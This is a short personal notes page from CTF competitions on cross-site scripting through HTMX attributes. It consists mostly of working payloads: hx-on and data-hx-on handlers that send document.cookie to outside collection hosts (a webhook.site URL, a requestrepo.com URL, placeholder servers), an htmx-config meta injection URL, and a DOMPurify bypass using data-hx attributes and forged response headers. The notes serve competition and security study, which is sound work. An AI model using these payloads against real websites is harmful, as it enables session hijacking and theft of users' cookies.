Skip to content

Dimas Maulana
Categories
CTF

HTMX

![[Pasted image 20230620190834.png]]https://htmx.org/attributes/hx-disable/#:~:text=The%20hx%2Ddisable%20attribute%20will,to%20prevent%20malicious%20scripting%20attacks gpn ctf 2023ctf/2024/linectf/we...

Created

Updated

1 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

![[Pasted image 20230620190834.png]]

https://htmx.org/attributes/hx-disable/#:~:text=The%20hx%2Ddisable%20attribute%20will,to%20prevent%20malicious%20scripting%20attacks gpn ctf 2023

<meta name="html-config" content='{"disableSelector":"[lol-no]"}'>

XSS in htmx

Awesomenotes I (flux ctf 2023)

    <div hx-get="/testing"  hx-on="htmx:beforeRequest: fetch('https://webhook.site/c70fb7e3-bcf3-400d-abbf-f094982542c0?'+document.cookie)"  hx-trigger="load delay:0.001s" hx-target="find div">      <div></div>    </div>
    <div hx-get="/lol"  hx-on="htmx:beforeRequest: alert(1)"  hx-trigger="load" hx-target="find div">      <div></div>    </div>
<h1 hx-get="/" hx-on::config-request="fetch(`{poll_server}/notify?token={token}&cookie=${{document.cookie}}`); event.preventDefault()" hx-trigger="htmx:after-process-node delay:0.001s" hx-target="this">test</h1>

XSS on htmx config if input inside meta

ctf/2024/linectf/web-auth-internal at master · theori-io/ctf (github.com)

http://35.200.122.11:20000/login?timeout={%22indicatorClass%22:%22%3C/style%3E%3Cimg%20src=1%20onerror=alert(1)%3E%3Cstyle%3Ess%22}%27%20x=%27&return_url=invalidscheme://11%27%20content=%27hehehe%27%20http-equiv=%27asdf%27%20name=%27htmx-config

    return_url = escape(request.args.get("return_url", "/login"))
    timeout = escape(request.args.get("timeout", "3"))
    session.pop("access_token", None)
    return render_template(
        "redirect.html",
        msg=f"<meta http-equiv='refresh' content='{timeout};url={return_url}'>redirect to page in {timeout} seconds...",
    )

equivalent to

<meta http-equiv="refresh" content="{&quot;indicatorClass&quot;:&quot;</style><img src=1 onerror=alert(1)><style>ss&quot;}" x=";url=invalidscheme://11" name="htmx-config">

HTMX Bypass Filter DOMPurify and Redirect

midnight-sub-ctf-2024/web/modern

If HTML is generated dynamically

<div hx-get="/{file}">

We can take the following approach if the URL redirects when using "/".

http://modern-1.play.hfsc.tf:8000/share/%5Cexample.com

we oob swap for modern, instead of hx header

<div data-nice data-hx-swap-oob="beforeend:html">
  <div data-hx-on::load="fetch('//server?'+document.cookie)">
</div>

I think ours was slightly unintended then.

Headers:

HX-Retarget: div.flex
Access-Control-Expose-Headers: HX-Retarget
Access-Control-Allow-Headers: hx-current-url,hx-request,hx-target
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *

Body:

<img data-hx-on:error="window.location.href = '<https://dy77uso9.requestrepo.com/?'> + document.cookie" src="<https://dy77uso9.requestrepo.com/test>">adasdsadsadas</img>

HX- Alternative

something like data-hx-on will bypass the dompurify

this kind of challenge I usually look into the source code (which wasn't too big) and I quickly noticed that data-hx is supported https://unpkg.com/htmx.org@1.9.11/dist/htmx.js

Categories & Topics

This note is categorized under the following topics. Click on any category to explore more related content.

CTF

Share this note

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

Categories

CTF